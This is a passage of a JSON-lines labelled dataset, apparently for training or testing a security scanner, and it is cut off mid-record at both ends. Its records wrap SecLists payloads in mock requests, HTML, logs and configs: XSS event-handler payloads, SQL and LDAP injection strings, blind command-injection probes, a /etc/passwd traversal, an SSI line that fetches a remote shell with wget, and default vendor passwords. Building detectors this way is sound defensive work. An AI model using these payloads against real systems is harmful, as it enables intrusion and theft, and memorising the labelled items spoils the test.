{"payload": "<script>alert(1)</script>", "injection_type": "XSS"}}]} {"id": "seclists_01700", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><style>@keyframes x{}</style><hgroup style=\"animation-name:x\" onanimationend=\"alert(1)\"></hgroup></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{}</style><hgroup style=\"animation-name:x\" onanimationend=\"alert(1)\"></hgroup>", "injection_type": "XSS"}}]} {"id": "seclists_01701", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = ') or (a=a';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ") or (a=a", "injection_type": "SQL"}}]} {"id": "seclists_01702", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=&%20echo%20MFHLGK$((15%2B22))$(echo%20MFHLGK)MFHLGK HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&%20echo%20MFHLGK$((15%2B22))$(echo%20MFHLGK)MFHLGK", "injection_type": "cmd"}}]} {"id": "seclists_01703", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=^&apos; HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "^&apos;", "injection_type": "cmd"}}]} {"id": "seclists_01704", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %7Cecho$IFSEDDVWA$((82%2B98))$(echo$IFSEDDVWA)EDDVWA&", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7Cecho$IFSEDDVWA$((82%2B98))$(echo$IFSEDDVWA)EDDVWA&", "injection_type": "cmd"}}]} {"id": "seclists_01705", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %3B%20str%3D%24%28echo%20KUMDME%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3B%20str%3D%24%28echo%20KUMDME%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C", "injection_type": "cmd"}}]} {"id": "seclists_01706", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><isindex oncontextmenu=\"alert(1)\">test</isindex></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<isindex oncontextmenu=\"alert(1)\">test</isindex>", "injection_type": "XSS"}}]} {"id": "seclists_01707", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=\"\\t\" HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"\\t\"", "injection_type": "cmd"}}]} {"id": "seclists_01708", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=tyson\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "tyson"}}]} {"id": "seclists_01709", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<del draggable=\"true\" ondragstart=\"alert(1)\">test</del>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<del draggable=\"true\" ondragstart=\"alert(1)\">test</del>", "injection_type": "XSS"}}]} {"id": "seclists_01710", "source": "seclists", "source_license": "MIT", "text": "password: hotgirl\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "hotgirl"}}]} {"id": "seclists_01711", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: <IMG SRC=\"jav\tascript:alert('XSS');\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<IMG SRC=\"jav\tascript:alert('XSS');\">", "injection_type": "cmd"}}]} {"id": "seclists_01712", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=a;id| HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "a;id|", "injection_type": "cmd"}}]} {"id": "seclists_01713", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=1) or sleep(__TIME__)# HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "1) or sleep(__TIME__)#", "injection_type": "SQL"}}]} {"id": "seclists_01714", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=' or (EXISTS) HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or (EXISTS)", "injection_type": "cmd"}}]} {"id": "seclists_01715", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit String: http://aa\"><script>alert(123)</script></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: http://aa\"><script>alert(123)</script>", "injection_type": "XSS"}}]} {"id": "seclists_01716", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Author Name: PHPIDS Group\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: PHPIDS Group", "injection_type": "XSS"}}]} {"id": "seclists_01717", "source": "seclists", "source_license": "MIT", "text": "filename=%3B%20str%3D%24%28echo%20JHAATD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3B%20str%3D%24%28echo%20JHAATD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522", "injection_type": "cmd"}}]} {"id": "seclists_01718", "source": "seclists", "source_license": "MIT", "text": "password: Lucent,bcim,bcimpw,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Lucent,bcim,bcimpw,"}}]} {"id": "seclists_01719", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><x%2Fonxxx=1</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x%2Fonxxx=1", "injection_type": "XSS"}}]} {"id": "seclists_01720", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VAVICY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VAVICY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C", "injection_type": "cmd"}}]} {"id": "seclists_01721", "source": "seclists", "source_license": "MIT", "text": "{% block content %}\n<h1>Hello ERB.version()</h1>\n{% endblock %}", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "ERB.version()", "injection_type": "SSTI"}}]} {"id": "seclists_01722", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a", "injection_type": "cmd"}}]} {"id": "seclists_01723", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%7C%7Cecho%20NLRFUJ$((16%2B3))$(echo%20NLRFUJ)NLRFUJ| HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%7Cecho%20NLRFUJ$((16%2B3))$(echo%20NLRFUJ)NLRFUJ|", "injection_type": "cmd"}}]} {"id": "seclists_01724", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<div draggable=\"true\" contenteditable>drag me</div><audio ondrop=alert(1) contenteditable>drop here</audio> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<div draggable=\"true\" contenteditable>drag me</div><audio ondrop=alert(1) contenteditable>drop here</audio>", "injection_type": "XSS"}}]} {"id": "seclists_01725", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Description: For performing XSS on sites that allow \u201d<SCRIPT>\u201d but don't allow \u201d<SCRIPT SRC...\u201d by way of the following regex filter: /<script[^>]+src/i</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: For performing XSS on sites that allow \u201d<SCRIPT>\u201d but don't allow \u201d<SCRIPT SRC...\u201d by way of the following regex filter: /<script[^>]+src/i", "injection_type": "XSS"}}]} {"id": "seclists_01726", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<tbody draggable=\"true\" ondrag=\"alert(1)\">test</tbody> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<tbody draggable=\"true\" ondrag=\"alert(1)\">test</tbody>", "injection_type": "XSS"}}]} {"id": "seclists_01727", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><map onbeforecopy=\"alert(1)\" contenteditable>test</map></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<map onbeforecopy=\"alert(1)\" contenteditable>test</map>", "injection_type": "XSS"}}]} {"id": "seclists_01728", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><code id=x style=\"position:absolute;\" onanimationcancel=\"alert(1)\"></code> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><code id=x style=\"position:absolute;\" onanimationcancel=\"alert(1)\"></code>", "injection_type": "XSS"}}]} {"id": "seclists_01729", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%7C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C", "injection_type": "cmd"}}]} {"id": "seclists_01730", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">(</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "(", "injection_type": "XSS"}}]} {"id": "seclists_01731", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Author Name: .mario HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: .mario", "injection_type": "XSS"}}]} {"id": "seclists_01732", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %22%7C%20%5B%201%20-ne%20%24%28echo%20AYUZTB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%7C%20%5B%201%20-ne%20%24%28echo%20AYUZTB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F", "injection_type": "cmd"}}]} {"id": "seclists_01733", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit String: perl -e 'print \"<IMG SRC=java\\0script:alert(\"XSS\")>\";'> out HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: perl -e 'print \"<IMG SRC=java\\0script:alert(\"XSS\")>\";'> out", "injection_type": "XSS"}}]} {"id": "seclists_01734", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \\\"blah", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\\"blah", "injection_type": "cmd"}}]} {"id": "seclists_01735", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#exec cmd=\"wget http://website.com/dir/shell.txt\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#exec cmd=\"wget http://website.com/dir/shell.txt\" -->", "injection_type": "SSI"}}]} {"id": "seclists_01736", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %26%20sleep%200%20%26%26%20str%3D%24%28echo%20SZMRAM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20SZMRAM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_01737", "source": "seclists", "source_license": "MIT", "text": "password: Digital Equipment,PRIV,PRIV,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Digital Equipment,PRIV,PRIV,"}}]} {"id": "seclists_01738", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>", "injection_type": "cmd"}}]} {"id": "seclists_01739", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<area onbeforepaste=\"alert(1)\" contenteditable>test</area> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<area onbeforepaste=\"alert(1)\" contenteditable>test</area>", "injection_type": "XSS"}}]} {"id": "seclists_01740", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Name: Basic JS breaker variant 5</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Basic JS breaker variant 5", "injection_type": "XSS"}}]} {"id": "seclists_01741", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%7C%20%5B%208%20-ne%20%24%28echo%20LAMXKC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%208%20-ne%20%24%28echo%20LAMXKC%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522", "injection_type": "cmd"}}]} {"id": "seclists_01742", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<base href=//0>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<base href=//0>", "injection_type": "XSS"}}]} {"id": "seclists_01743", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Author Name: OWASP HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: OWASP", "injection_type": "XSS"}}]} {"id": "seclists_01744", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'admin\") or \"1\"=\"1\"--';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin\") or \"1\"=\"1\"--", "injection_type": "SQL"}}]} {"id": "seclists_01745", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Axis,<N/A>,<BLANK>,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Axis,<N/A>,<BLANK>,"}}]} {"id": "seclists_01746", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host='or select * HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'or select *", "injection_type": "cmd"}}]} {"id": "seclists_01747", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %2527%3B%20str%3D%24%28echo%20NSSNST%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%3B%20str%3D%24%28echo%20NSSNST%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_01748", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=celebrity\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "celebrity"}}]} {"id": "seclists_01749", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><audio id=x style=\"position:absolute;\" onanimationcancel=\"alert(1)\"></audio></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><audio id=x style=\"position:absolute;\" onanimationcancel=\"alert(1)\"></audio>", "injection_type": "XSS"}}]} {"id": "seclists_01750", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><footer onblur=alert(1) tabindex=1 id=x></footer><input autofocus></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<footer onblur=alert(1) tabindex=1 id=x></footer><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_01751", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Description: DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz (http://www.sysdream.com) as a vulnerability in Hotmail.\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz (http://www.sysdream.com) as a vulnerability in Hotmail.", "injection_type": "XSS"}}]} {"id": "seclists_01752", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><acronym onfocusout=alert(1) tabindex=1 id=x></acronym><input autofocus></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<acronym onfocusout=alert(1) tabindex=1 id=x></acronym><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_01753", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: <?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>", "injection_type": "cmd"}}]} {"id": "seclists_01754", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=\";waitfor delay '0:0:__TIME__'-- HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\";waitfor delay '0:0:__TIME__'--", "injection_type": "SQL"}}]} {"id": "seclists_01755", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = %21", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%21", "injection_type": "SQL"}}]} {"id": "seclists_01756", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host='%0aecho$IFSUOWFKR$((67%2B63))$(echo$IFSUOWFKR)UOWFKR HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'%0aecho$IFSUOWFKR$((67%2B63))$(echo$IFSUOWFKR)UOWFKR", "injection_type": "cmd"}}]} {"id": "seclists_01757", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><svg id=x onfocusin=alert(1)></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<svg id=x onfocusin=alert(1)>", "injection_type": "XSS"}}]} {"id": "seclists_01758", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<embed src=1 onerror=alert(1) type=image/gif> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<embed src=1 onerror=alert(1) type=image/gif>", "injection_type": "XSS"}}]} {"id": "seclists_01759", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Netgear,<BLANK>,zebra,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Netgear,<BLANK>,zebra,"}}]} {"id": "seclists_01760", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<embed onmouseover=\"alert(1)\">test</embed> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<embed onmouseover=\"alert(1)\">test</embed>", "injection_type": "XSS"}}]} {"id": "seclists_01761", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:ACCTON,none,0,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "ACCTON,none,0,"}}]} {"id": "seclists_01762", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<slot oncopy=\"alert(1)\" contenteditable>test</slot> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<slot oncopy=\"alert(1)\" contenteditable>test</slot>", "injection_type": "XSS"}}]} {"id": "seclists_01763", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \\0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\0", "injection_type": "cmd"}}]} {"id": "seclists_01764", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %3Becho$IFSMKSRXM$((30%2B19))$(echo$IFSMKSRXM)MKSRXM|", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3Becho$IFSMKSRXM$((30%2B19))$(echo$IFSMKSRXM)MKSRXM|", "injection_type": "cmd"}}]} {"id": "seclists_01765", "source": "seclists", "source_license": "MIT", "text": "password: nathan1\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "nathan1"}}]} {"id": "seclists_01766", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=AMI,<N/A>,AMI~,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "AMI,<N/A>,AMI~,"}}]} {"id": "seclists_01767", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %0aecho%20RWVTYR$((38%2B86))$(echo%20RWVTYR)RWVTYR'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0aecho%20RWVTYR$((38%2B86))$(echo%20RWVTYR)RWVTYR'", "injection_type": "cmd"}}]} {"id": "seclists_01768", "source": "seclists", "source_license": "MIT", "text": "username=*(|(mail=*))&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "*(|(mail=*))", "injection_type": "SQL"}}]} {"id": "seclists_01769", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%22;echo$IFSRBNXNK$((31%2B22))$(echo$IFSRBNXNK)RBNXNK| HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22;echo$IFSRBNXNK$((31%2B22))$(echo$IFSRBNXNK)RBNXNK|", "injection_type": "cmd"}}]} {"id": "seclists_01770", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Name: Cookie Manipulation</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Cookie Manipulation", "injection_type": "XSS"}}]} {"id": "seclists_01771", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Description: PHP - requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues.</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: PHP - requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues.", "injection_type": "XSS"}}]} {"id": "seclists_01772", "source": "seclists", "source_license": "MIT", "text": "filename=%00/etc/passwd%00", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%00/etc/passwd%00", "injection_type": "cmd"}}]} {"id": "seclists_01773", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><details draggable=\"true\" ondragstart=\"alert(1)\">test</details></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<details draggable=\"true\" ondragstart=\"alert(1)\">test</details>", "injection_type": "XSS"}}]} {"id": "seclists_01774", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><dialog id=x tabindex=1 onfocusin=alert(1)></dialog></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<dialog id=x tabindex=1 onfocusin=alert(1)></dialog>", "injection_type": "XSS"}}]} {"id": "seclists_01775", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<style>@keyframes x{}</style><bdi style=\"animation-name:x\" onanimationstart=\"alert(1)\"></bdi>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": 